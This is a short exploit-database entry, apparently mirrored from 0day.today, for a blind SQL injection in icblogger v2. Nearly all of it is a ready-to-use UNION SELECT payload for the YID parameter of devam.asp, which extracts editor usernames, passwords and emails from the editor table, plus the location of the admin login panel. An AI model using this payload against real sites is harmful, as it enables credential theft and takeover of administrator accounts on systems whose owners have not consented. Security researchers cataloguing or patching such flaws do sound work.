id: 766
date: 08/31/2006
title: icblogger v2 (YID) Remote SQL Injection Vulnerability
author: Chironex Fleckeri
cves: 

=====================================================
icblogger v2 (YID) Remote SQL Injection Vulnerability
=====================================================


################################################################################
##                                                                            ##
##  Icblogger <= "YID" Remote Blind SQL Injection                             ##
##  - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -       ##
##  Credit by        |  Chironex Fleckeri                                     ##
##  - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -       ##
##                                                                            ##
################################################################################

##########################################################################################################################################################################
#Usage : http://www.target.com/path/devam.asp?YID=-1 UNION SELECT null,null,null,null,null,editor_adi,null,editor_sifre,editor_mail,null FROM editor WHERE editor_id = 1 #
##########################################################################################################################################################################

#############################################################
#Admin Panel : http://www.target.com/path/admin/default.asp #
#############################################################



#  0day.today [2023-03-25]  #